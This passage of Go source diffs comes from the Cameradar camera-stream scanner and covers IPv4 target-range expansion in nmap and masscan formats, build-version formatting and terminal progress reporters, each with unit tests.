|
||||
start int
|
||||
end int
|
||||
}
|
||||
|
||||
func parseIPv4Range(target string) ([]netip.Addr, bool, error) {
|
||||
parts := strings.Split(target, ".")
|
||||
if len(parts) != 4 {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
ranges := make([]octetRange, 4)
|
||||
for i, part := range parts {
|
||||
parsed, ok, err := parseOctetRange(part)
|
||||
if err != nil {
|
||||
return nil, true, err
|
||||
}
|
||||
|
||||
if !ok {
|
||||
return nil, false, nil
|
||||
}
|
||||
ranges[i] = parsed
|
||||
}
|
||||
|
||||
addrs := make([]netip.Addr, 0, 16)
|
||||
for first := ranges[0].start; first <= ranges[0].end; first++ {
|
||||
for second := ranges[1].start; second <= ranges[1].end; second++ {
|
||||
for third := ranges[2].start; third <= ranges[2].end; third++ {
|
||||
for fourth := ranges[3].start; fourth <= ranges[3].end; fourth++ {
|
||||
addrs = append(addrs, netip.AddrFrom4([4]byte{
|
||||
byte(first),
|
||||
byte(second),
|
||||
byte(third),
|
||||
byte(fourth),
|
||||
}))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return addrs, true, nil
|
||||
}
|
||||
|
||||
func parseOctetRange(value string) (octetRange, bool, error) {
|
||||
value = strings.TrimSpace(value)
|
||||
if value == "" {
|
||||
return octetRange{}, false, nil
|
||||
}
|
||||
|
||||
if strings.Contains(value, "-") {
|
||||
parts := strings.SplitN(value, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return octetRange{}, true, fmt.Errorf("invalid range %q", value)
|
||||
}
|
||||
|
||||
start, err := parseOctetValue(strings.TrimSpace(parts[0]))
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
end, err := parseOctetValue(strings.TrimSpace(parts[1]))
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
if start > end {
|
||||
return octetRange{}, true, fmt.Errorf("invalid range %q", value)
|
||||
}
|
||||
|
||||
return octetRange{start: start, end: end}, true, nil
|
||||
}
|
||||
|
||||
if !isDigits(value) {
|
||||
return octetRange{}, false, nil
|
||||
}
|
||||
|
||||
octet, err := parseOctetValue(value)
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
|
||||
return octetRange{start: octet, end: octet}, true, nil
|
||||
}
|
||||
|
||||
func parseOctetValue(value string) (int, error) {
|
||||
if !isDigits(value) {
|
||||
return 0, fmt.Errorf("invalid octet %q", value)
|
||||
}
|
||||
parsed, err := strconv.Atoi(value)
|
||||
if err != nil {
|
||||
return 0, fmt.Errorf("invalid octet %q", value)
|
||||
}
|
||||
if parsed < 0 || parsed > 255 {
|
||||
return 0, fmt.Errorf("octet %d out of range", parsed)
|
||||
}
|
||||
return parsed, nil
|
||||
}
|
||||
|
||||
func isDigits(value string) bool {
|
||||
for _, r := range value {
|
||||
if r < '0' || r > '9' {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return value != ""
|
||||
}
|
||||
@@ -0,0 +1,107 @@
|
||||
package skip_test
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/skip"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNew_ExpandsTargetsAndPorts(t *testing.T) {
|
||||
targets := []string{
|
||||
"192.0.2.0/30",
|
||||
"192.0.2.15",
|
||||
"192.0.2.10-11",
|
||||
}
|
||||
ports := []string{"554", "8554-8555"}
|
||||
|
||||
scanner := skip.New(targets, ports)
|
||||
|
||||
streams, err := scanner.Scan(t.Context())
|
||||
require.NoError(t, err)
|
||||
|
||||
addrs := []netip.Addr{
|
||||
netip.MustParseAddr("192.0.2.0"),
|
||||
netip.MustParseAddr("192.0.2.1"),
|
||||
netip.MustParseAddr("192.0.2.2"),
|
||||
netip.MustParseAddr("192.0.2.3"),
|
||||
netip.MustParseAddr("192.0.2.10"),
|
||||
netip.MustParseAddr("192.0.2.11"),
|
||||
netip.MustParseAddr("192.0.2.15"),
|
||||
}
|
||||
portsExpected := []uint16{554, 8554, 8555}
|
||||
|
||||
var want []string
|
||||
for _, addr := range addrs {
|
||||
for _, port := range portsExpected {
|
||||
want = append(want, addr.String()+":"+strconv.Itoa(int(port)))
|
||||
}
|
||||
}
|
||||
|
||||
var got []string
|
||||
for _, stream := range streams {
|
||||
got = append(got, stream.Address.String()+":"+strconv.Itoa(int(stream.Port)))
|
||||
}
|
||||
|
||||
assert.ElementsMatch(t, want, got)
|
||||
}
|
||||
|
||||
func TestNew_ReturnsErrorOnInvalidPortRange(t *testing.T) {
|
||||
scanner := skip.New([]string{"192.0.2.1"}, []string{"8555-8554"})
|
||||
|
||||
_, err := scanner.Scan(t.Context())
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "invalid port range")
|
||||
}
|
||||
|
||||
func TestNew_ReturnsErrorOnEmptyTargets(t *testing.T) {
|
||||
scanner := skip.New([]string{}, []string{"554"})
|
||||
|
||||
_, err := scanner.Scan(t.Context())
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "no valid target addresses resolved")
|
||||
}
|
||||
|
||||
func TestNew_ResolvesServicePorts(t *testing.T) {
|
||||
scanner := skip.New([]string{"127.0.0.1"}, []string{"http"})
|
||||
|
||||
streams, err := scanner.Scan(t.Context())
|
||||
require.NoError(t, err)
|
||||
require.Len(t, streams, 1)
|
||||
|
||||
assert.Equal(t, netip.MustParseAddr("127.0.0.1"), streams[0].Address)
|
||||
assert.Equal(t, uint16(80), streams[0].Port)
|
||||
}
|
||||
|
||||
func TestNew_ReturnsErrorOnUnknownServicePort(t *testing.T) {
|
||||
scanner := skip.New([]string{"127.0.0.1"}, []string{"not-a-service"})
|
||||
|
||||
_, err := scanner.Scan(t.Context())
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "invalid port")
|
||||
}
|
||||
|
||||
func TestNew_ResolvesHostnames(t *testing.T) {
|
||||
scanner := skip.New([]string{"localhost"}, []string{"554"})
|
||||
|
||||
streams, err := scanner.Scan(t.Context())
|
||||
require.NoError(t, err)
|
||||
require.NotEmpty(t, streams)
|
||||
addr := streams[0].Address
|
||||
assert.True(t,
|
||||
addr == netip.MustParseAddr("127.0.0.1") || addr == netip.MustParseAddr("::1"),
|
||||
"expected localhost to resolve to 127.0.0.1 or ::1, got %s",
|
||||
addr.String(),
|
||||
)
|
||||
}
|
||||
|
||||
func TestNew_ReturnsErrorOnHostnameLookupFailure(t *testing.T) {
|
||||
scanner := skip.New([]string{"does-not-exist.invalid"}, []string{"554"})
|
||||
|
||||
_, err := scanner.Scan(t.Context())
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "resolving hostname")
|
||||
}
|
||||
@@ -0,0 +1,139 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"math/bits"
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func expandTargetsForScan(targets []string) ([]string, error) {
|
||||
expanded := make([]string, 0, len(targets))
|
||||
for _, target := range targets {
|
||||
value := strings.TrimSpace(target)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
addrs, ok, err := parseIPv4RangePair(value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if ok {
|
||||
expanded = append(expanded, addrs...)
|
||||
continue
|
||||
}
|
||||
|
||||
expanded = append(expanded, value)
|
||||
}
|
||||
|
||||
return expanded, nil
|
||||
}
|
||||
|
||||
// Parse masscan range formats.
|
||||
func parseIPv4RangePair(target string) ([]string, bool, error) {
|
||||
parts := strings.SplitN(target, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
startValue := strings.TrimSpace(parts[0])
|
||||
endValue := strings.TrimSpace(parts[1])
|
||||
if startValue == "" || endValue == "" {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
// Fall through if this is in nmap range format.
|
||||
if endIsOctet(endValue) {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
startAddr, startOK := parseIPv4Addr(startValue)
|
||||
endAddr, endOK := parseIPv4Addr(endValue)
|
||||
if !startOK && !endOK { // Allows the case where the target is just a hostname with a dash.
|
||||
return nil, false, nil
|
||||
}
|
||||
if !startOK || !endOK { // Prevents the case where one is an address and the other part is not.
|
||||
return nil, false, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
startAddr = startAddr.Unmap()
|
||||
endAddr = endAddr.Unmap()
|
||||
if !startAddr.Is4() || !endAddr.Is4() {
|
||||
return nil, true, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
start := ipv4ToUint32(startAddr)
|
||||
end := ipv4ToUint32(endAddr)
|
||||
if start > end {
|
||||
return nil, true, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
return expandIPv4RangeToTargets(start, end), true, nil
|
||||
}
|
||||
|
||||
func parseIPv4Addr(value string) (netip.Addr, bool) {
|
||||
addr, err := netip.ParseAddr(value)
|
||||
if err != nil {
|
||||
return netip.Addr{}, false
|
||||
}
|
||||
return addr, true
|
||||
}
|
||||
|
||||
func endIsOctet(value string) bool {
|
||||
parsed, err := strconv.Atoi(strings.TrimSpace(value))
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
return parsed >= 0 && parsed <= 255
|
||||
}
|
||||
|
||||
func expandIPv4RangeToTargets(start, end uint32) []string {
|
||||
if start > end {
|
||||
return nil
|
||||
}
|
||||
|
||||
const maxUint32 = uint64(^uint32(0))
|
||||
remaining := uint64(end) - uint64(start) + 1
|
||||
results := make([]string, 0, 16)
|
||||
|
||||
for current := uint64(start); remaining > 0; {
|
||||
if current > maxUint32 {
|
||||
return results
|
||||
}
|
||||
|
||||
current32 := uint32(current)
|
||||
maxSize := uint64(1) << bits.TrailingZeros32(current32)
|
||||
for maxSize > remaining {
|
||||
maxSize >>= 1
|
||||
}
|
||||
|
||||
prefixLen := 32 - (bits.Len64(maxSize) - 1)
|
||||
addr := uint32ToIPv4(current32)
|
||||
if maxSize == 1 {
|
||||
results = append(results, addr.String())
|
||||
} else {
|
||||
results = append(results, fmt.Sprintf("%s/%d", addr.String(), prefixLen))
|
||||
}
|
||||
|
||||
current += maxSize
|
||||
remaining -= maxSize
|
||||
}
|
||||
|
||||
return results
|
||||
}
|
||||
|
||||
func ipv4ToUint32(addr netip.Addr) uint32 {
|
||||
value := addr.As4()
|
||||
return uint32(value[0])<<24 | uint32(value[1])<<16 | uint32(value[2])<<8 | uint32(value[3])
|
||||
}
|
||||
|
||||
func uint32ToIPv4(value uint32) netip.Addr {
|
||||
return netip.AddrFrom4([4]byte{
|
||||
byte(value >> 24),
|
||||
byte(value >> 16),
|
||||
byte(value >> 8),
|
||||
byte(value),
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,73 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestExpandTargetsForScan_ExpandsFullIPv4Range(t *testing.T) {
|
||||
targets := []string{
|
||||
"192.0.2.10-192.0.2.12",
|
||||
"192.168.1.140-255",
|
||||
"192.0.2.0/30",
|
||||
"localhost",
|
||||
"",
|
||||
}
|
||||
|
||||
got, err := expandTargetsForScan(targets)
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.ElementsMatch(t, []string{
|
||||
"192.0.2.10/31",
|
||||
"192.0.2.12",
|
||||
"192.168.1.140-255",
|
||||
"192.0.2.0/30",
|
||||
"localhost",
|
||||
}, got)
|
||||
}
|
||||
|
||||
func TestExpandTargetsForScan_ReturnsErrorOnInvalidRange(t *testing.T) {
|
||||
t.Run("inverted range", func(t *testing.T) {
|
||||
_, err := expandTargetsForScan([]string{"192.0.2.12-192.0.2.10"})
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "invalid range")
|
||||
})
|
||||
|
||||
t.Run("invalid range", func(t *testing.T) {
|
||||
_, err := expandTargetsForScan([]string{"192.0.2.12-foo"})
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "invalid range")
|
||||
})
|
||||
|
||||
t.Run("hostname with dash", func(t *testing.T) {
|
||||
tgts, err := expandTargetsForScan([]string{"my-host.com"})
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []string{"my-host.com"}, tgts)
|
||||
})
|
||||
|
||||
t.Run("ends with dash", func(t *testing.T) {
|
||||
tgts, err := expandTargetsForScan([]string{"a-"})
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []string{"a-"}, tgts)
|
||||
})
|
||||
|
||||
t.Run("starts with dash", func(t *testing.T) {
|
||||
tgts, err := expandTargetsForScan([]string{"-a"})
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []string{"-a"}, tgts)
|
||||
})
|
||||
|
||||
t.Run("only a dash", func(t *testing.T) {
|
||||
tgts, err := expandTargetsForScan([]string{"-"})
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []string{"-"}, tgts)
|
||||
})
|
||||
|
||||
t.Run("nmap format", func(t *testing.T) {
|
||||
tgts, err := expandTargetsForScan([]string{"192.168.1.10-255"})
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []string{"192.168.1.10-255"}, tgts)
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,48 @@
|
||||
package ui
|
||||
|
||||
import "strings"
|
||||
|
||||
// BuildInfo represents build metadata injected at link time.
|
||||
type BuildInfo struct {
|
||||
Version string
|
||||
Commit string
|
||||
Date string
|
||||
}
|
||||
|
||||
// DisplayVersion returns the version prefixed with "v" when needed.
|
||||
func (b BuildInfo) DisplayVersion() string {
|
||||
version := strings.TrimSpace(b.Version)
|
||||
if version == "" {
|
||||
version = "dev"
|
||||
}
|
||||
if strings.HasPrefix(version, "v") {
|
||||
return version
|
||||
}
|
||||
return "v" + version
|
||||
}
|
||||
|
||||
// LogVersion returns the version without a leading "v".
|
||||
func (b BuildInfo) LogVersion() string {
|
||||
version := strings.TrimSpace(b.Version)
|
||||
if version == "" {
|
||||
return "dev"
|
||||
}
|
||||
return strings.TrimPrefix(version, "v")
|
||||
}
|
||||
|
||||
// ShortCommit returns a shortened commit hash suitable for display.
|
||||
func (b BuildInfo) ShortCommit() string {
|
||||
commit := strings.TrimSpace(b.Commit)
|
||||
if commit == "" || commit == "none" || commit == "unknown" {
|
||||
return "unknown"
|
||||
}
|
||||
if len(commit) > 7 {
|
||||
return commit[:7]
|
||||
}
|
||||
return commit
|
||||
}
|
||||
|
||||
// TUIHeader returns the header used by the TUI.
|
||||
func (b BuildInfo) TUIHeader() string {
|
||||
return "Cameradar — " + b.DisplayVersion() + " (" + b.ShortCommit() + ")"
|
||||
}
|
||||
@@ -0,0 +1,175 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestBuildInfo_DisplayVersion(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
version string
|
||||
want string
|
||||
}{
|
||||
{
|
||||
name: "empty defaults to dev with prefix",
|
||||
version: "",
|
||||
want: "vdev",
|
||||
},
|
||||
{
|
||||
name: "dev without prefix",
|
||||
version: "dev",
|
||||
want: "vdev",
|
||||
},
|
||||
{
|
||||
name: "already prefixed",
|
||||
version: "v1.2.3",
|
||||
want: "v1.2.3",
|
||||
},
|
||||
{
|
||||
name: "adds prefix",
|
||||
version: "1.2.3",
|
||||
want: "v1.2.3",
|
||||
},
|
||||
{
|
||||
name: "trims spaces with prefix",
|
||||
version: " v2.0 ",
|
||||
want: "v2.0",
|
||||
},
|
||||
{
|
||||
name: "trims spaces without prefix",
|
||||
version: " 2.0 ",
|
||||
want: "v2.0",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
info := ui.BuildInfo{Version: test.version}
|
||||
assert.Equal(t, test.want, info.DisplayVersion())
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildInfo_LogVersion(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
version string
|
||||
want string
|
||||
}{
|
||||
{
|
||||
name: "empty defaults to dev",
|
||||
version: "",
|
||||
want: "dev",
|
||||
},
|
||||
{
|
||||
name: "removes leading v",
|
||||
version: "v1.2.3",
|
||||
want: "1.2.3",
|
||||
},
|
||||
{
|
||||
name: "keeps version without prefix",
|
||||
version: "1.2.3",
|
||||
want: "1.2.3",
|
||||
},
|
||||
{
|
||||
name: "trims spaces and removes prefix",
|
||||
version: " v2.0 ",
|
||||
want: "2.0",
|
||||
},
|
||||
{
|
||||
name: "removes only first prefix",
|
||||
version: "vv1",
|
||||
want: "v1",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
info := ui.BuildInfo{Version: test.version}
|
||||
assert.Equal(t, test.want, info.LogVersion())
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildInfo_ShortCommit(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
commit string
|
||||
want string
|
||||
}{
|
||||
{
|
||||
name: "empty defaults to unknown",
|
||||
commit: "",
|
||||
want: "unknown",
|
||||
},
|
||||
{
|
||||
name: "none defaults to unknown",
|
||||
commit: "none",
|
||||
want: "unknown",
|
||||
},
|
||||
{
|
||||
name: "unknown defaults to unknown",
|
||||
commit: "unknown",
|
||||
want: "unknown",
|
||||
},
|
||||
{
|
||||
name: "short commit preserved",
|
||||
commit: "abcdef",
|
||||
want: "abcdef",
|
||||
},
|
||||
{
|
||||
name: "seven chars preserved",
|
||||
commit: "abcdefg",
|
||||
want: "abcdefg",
|
||||
},
|
||||
{
|
||||
name: "long commit shortened",
|
||||
commit: "abcdefghi",
|
||||
want: "abcdefg",
|
||||
},
|
||||
{
|
||||
name: "trims spaces before shortening",
|
||||
commit: " 1234567890 ",
|
||||
want: "1234567",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
info := ui.BuildInfo{Commit: test.commit}
|
||||
assert.Equal(t, test.want, info.ShortCommit())
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildInfo_TUIHeader(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
version string
|
||||
commit string
|
||||
want string
|
||||
}{
|
||||
{
|
||||
name: "uses display version and short commit",
|
||||
version: "1.2.3",
|
||||
commit: "abcdefghi",
|
||||
want: "Cameradar — v1.2.3 (abcdefg)",
|
||||
},
|
||||
{
|
||||
name: "uses defaults for empty values",
|
||||
version: "",
|
||||
commit: "",
|
||||
want: "Cameradar — vdev (unknown)",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
info := ui.BuildInfo{Version: test.version, Commit: test.commit}
|
||||
assert.Equal(t, test.want, info.TUIHeader())
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,29 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// NopReporter discards all UI events.
|
||||
type NopReporter struct{}
|
||||
|
||||
// Start implements Reporter.
|
||||
func (NopReporter) Start(cameradar.Step, string) {}
|
||||
|
||||
// Done implements Reporter.
|
||||
func (NopReporter) Done(cameradar.Step, string) {}
|
||||
|
||||
// Progress implements Reporter.
|
||||
func (NopReporter) Progress(cameradar.Step, string) {}
|
||||
|
||||
// Debug implements Reporter.
|
||||
func (NopReporter) Debug(cameradar.Step, string) {}
|
||||
|
||||
// Error implements Reporter.
|
||||
func (NopReporter) Error(cameradar.Step, error) {}
|
||||
|
||||
// Summary implements Reporter.
|
||||
func (NopReporter) Summary([]cameradar.Stream, error) {}
|
||||
|
||||
// Close implements Reporter.
|
||||
func (NopReporter) Close() {}
|
||||
@@ -0,0 +1,104 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"io"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// PlainReporter renders a line-oriented UI for non-interactive terminals.
|
||||
type PlainReporter struct {
|
||||
out io.Writer
|
||||
debug bool
|
||||
}
|
||||
|
||||
// NewPlainReporter creates a line-oriented reporter.
|
||||
func NewPlainReporter(out io.Writer, debug bool) *PlainReporter {
|
||||
return &PlainReporter{
|
||||
out: out,
|
||||
debug: debug,
|
||||
}
|
||||
}
|
||||
|
||||
// PrintStartup prints build metadata and configuration options.
|
||||
func (r *PlainReporter) PrintStartup(buildInfo BuildInfo, options []string) {
|
||||
step := cameradar.Step("Startup")
|
||||
message := fmt.Sprintf("Running cameradar version %s, commit %s", buildInfo.LogVersion(), buildInfo.ShortCommit())
|
||||
r.print(step, "INFO", message)
|
||||
if len(options) == 0 {
|
||||
return
|
||||
}
|
||||
for _, option := range options {
|
||||
r.print(step, "INFO", option)
|
||||
}
|
||||
}
|
||||
|
||||
// Start prints the beginning of a step.
|
||||
func (r *PlainReporter) Start(step cameradar.Step, message string) {
|
||||
r.print(step, "STEP", message)
|
||||
}
|
||||
|
||||
// Done prints the completion of a step.
|
||||
func (r *PlainReporter) Done(step cameradar.Step, message string) {
|
||||
r.print(step, "DONE", message)
|
||||
}
|
||||
|
||||
// Progress prints a progress message.
|
||||
func (r *PlainReporter) Progress(step cameradar.Step, message string) {
|
||||
if _, _, ok := cameradar.ParseProgressMessage(message); ok {
|
||||
return
|
||||
}
|
||||
r.print(step, "INFO", message)
|
||||
}
|
||||
|
||||
// Debug prints a debug message when debug mode is enabled.
|
||||
func (r *PlainReporter) Debug(step cameradar.Step, message string) {
|
||||
if !r.debug {
|
||||
return
|
||||
}
|
||||
r.print(step, "DBUG", message)
|
||||
}
|
||||
|
||||
// Error prints an error message.
|
||||
func (r *PlainReporter) Error(step cameradar.Step, err error) {
|
||||
if err == nil {
|
||||
return
|
||||
}
|
||||
r.print(step, "EROR", err.Error())
|
||||
}
|
||||
|
||||
// Summary prints the final summary.
|
||||
func (r *PlainReporter) Summary(streams []cameradar.Stream, err error) {
|
||||
_, _ = fmt.Fprintln(r.out, "Summary")
|
||||
_, _ = fmt.Fprintln(r.out, "-------")
|
||||
_, _ = fmt.Fprintln(r.out, FormatSummary(streams, err))
|
||||
}
|
||||
|
||||
// Close is a no-op for the plain reporter.
|
||||
func (r *PlainReporter) Close() {}
|
||||
|
||||
func (r *PlainReporter) print(step cameradar.Step, level, message string) {
|
||||
if message == "" {
|
||||
return
|
||||
}
|
||||
|
||||
level = normalizeLevel(level)
|
||||
_, _ = fmt.Fprintf(r.out, "%s [%s] %s: %s\n", time.Now().Format(time.RFC3339), level, cameradar.StepLabel(step), message)
|
||||
}
|
||||
|
||||
func normalizeLevel(level string) string {
|
||||
switch level {
|
||||
case "DEBUG":
|
||||
return "DBUG"
|
||||
case "ERROR":
|
||||
return "EROR"
|
||||
case "START", "STEP":
|
||||
return "STEP"
|
||||
}
|
||||
if len(level) >= 4 {
|
||||
return level[:4]
|
||||
}
|
||||
return fmt.Sprintf("%-4s", level)
|
||||
}
|
||||
@@ -0,0 +1,75 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"errors"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestPlainReporter_Outputs(t *testing.T) {
|
||||
t.Run("prints events", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, true)
|
||||
|
||||
reporter.Start(cameradar.StepScan, "starting")
|
||||
reporter.Progress(cameradar.StepScan, "working")
|
||||
reporter.Debug(cameradar.StepScan, "details")
|
||||
reporter.Done(cameradar.StepScan, "finished")
|
||||
reporter.Error(cameradar.StepScan, errors.New("boom"))
|
||||
reporter.Summary([]cameradar.Stream{}, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [STEP] Scan targets: starting")
|
||||
assert.Contains(t, content, " [INFO] Scan targets: working")
|
||||
assert.Contains(t, content, " [DBUG] Scan targets: details")
|
||||
assert.Contains(t, content, " [DONE] Scan targets: finished")
|
||||
assert.Contains(t, content, " [EROR] Scan targets: boom")
|
||||
assert.Contains(t, content, "Summary\n-------\nAccessible streams: 0")
|
||||
})
|
||||
|
||||
t.Run("respects debug flag and empty input", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.Debug(cameradar.StepScan, "hidden")
|
||||
reporter.Progress(cameradar.StepScan, "")
|
||||
reporter.Error(cameradar.StepScan, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.NotContains(t, content, "DBUG")
|
||||
assert.Equal(t, "", strings.TrimSpace(content))
|
||||
})
|
||||
}
|
||||
|
||||
func TestPlainReporter_PrintStartup(t *testing.T) {
|
||||
t.Run("prints build info and options", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.PrintStartup(ui.BuildInfo{Version: "v1.2.3", Commit: "abcdefghi"}, []string{
|
||||
"targets: 127.0.0.1",
|
||||
"ports: 554",
|
||||
})
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [INFO] Startup: Running cameradar version 1.2.3, commit abcdefg")
|
||||
assert.Contains(t, content, " [INFO] Startup: targets: 127.0.0.1")
|
||||
assert.Contains(t, content, " [INFO] Startup: ports: 554")
|
||||
})
|
||||
|
||||
t.Run("prints only build info when options empty", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.PrintStartup(ui.BuildInfo{Version: "", Commit: "none"}, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [INFO] Startup: Running cameradar version dev, commit unknown")
|
||||
assert.Equal(t, 1, strings.Count(content, " Startup: "))
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,45 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// Reporter defines the interface for cameradar UIs.
|
||||
type Reporter interface {
|
||||
Start(step cameradar.Step, message string)
|
||||
Done(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
Debug(step cameradar.Step, message string)
|
||||
Error(step cameradar.Step, err error)
|
||||
Summary(streams []cameradar.Stream, err error)
|
||||
Close()
|
||||
}
|
||||
|
||||
// NewReporter creates a Reporter based on the requested mode.
|
||||
func NewReporter(mode cameradar.Mode, debug bool, out io.Writer, interactive bool, buildInfo BuildInfo, cancel context.CancelFunc) (Reporter, error) {
|
||||
if debug {
|
||||
return NewPlainReporter(out, debug), nil
|
||||
}
|
||||
|
||||
switch mode {
|
||||
case cameradar.ModePlain:
|
||||
return NewPlainReporter(out, debug), nil
|
||||
case cameradar.ModeTUI:
|
||||
if !interactive {
|
||||
return nil, errors.New("tui mode requires an interactive terminal")
|
||||
}
|
||||
return NewTUIReporter(debug, out, buildInfo, cancel)
|
||||
case cameradar.ModeAuto:
|
||||
if interactive {
|
||||
return NewTUIReporter(debug, out, buildInfo, cancel)
|
||||
}
|
||||
return NewPlainReporter(out, debug), nil
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported ui mode %q", mode)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,94 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNewReporter(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
mode cameradar.Mode
|
||||
interactive bool
|
||||
wantType string
|
||||
wantErrContains string
|
||||
}{
|
||||
{
|
||||
name: "plain",
|
||||
mode: cameradar.ModePlain,
|
||||
interactive: false,
|
||||
wantType: "plain",
|
||||
},
|
||||
{
|
||||
name: "auto non-interactive",
|
||||
mode: cameradar.ModeAuto,
|
||||
interactive: false,
|
||||
wantType: "plain",
|
||||
},
|
||||
{
|
||||
name: "tui non-interactive",
|
||||
mode: cameradar.ModeTUI,
|
||||
interactive: false,
|
||||
wantErrContains: "interactive terminal",
|
||||
},
|
||||
{
|
||||
name: "unsupported",
|
||||
mode: cameradar.Mode("unknown"),
|
||||
interactive: false,
|
||||
wantErrContains: "unsupported ui mode",
|
||||
},
|
||||
{
|
||||
name: "auto interactive",
|
||||
mode: cameradar.ModeAuto,
|
||||
interactive: true,
|
||||
wantType: "tui",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
|
||||
reporter, err := ui.NewReporter(test.mode, false, out, test.interactive, ui.BuildInfo{Version: "dev", Commit: "none"}, func() {})
|
||||
|
||||
if test.wantErrContains != "" {
|
||||
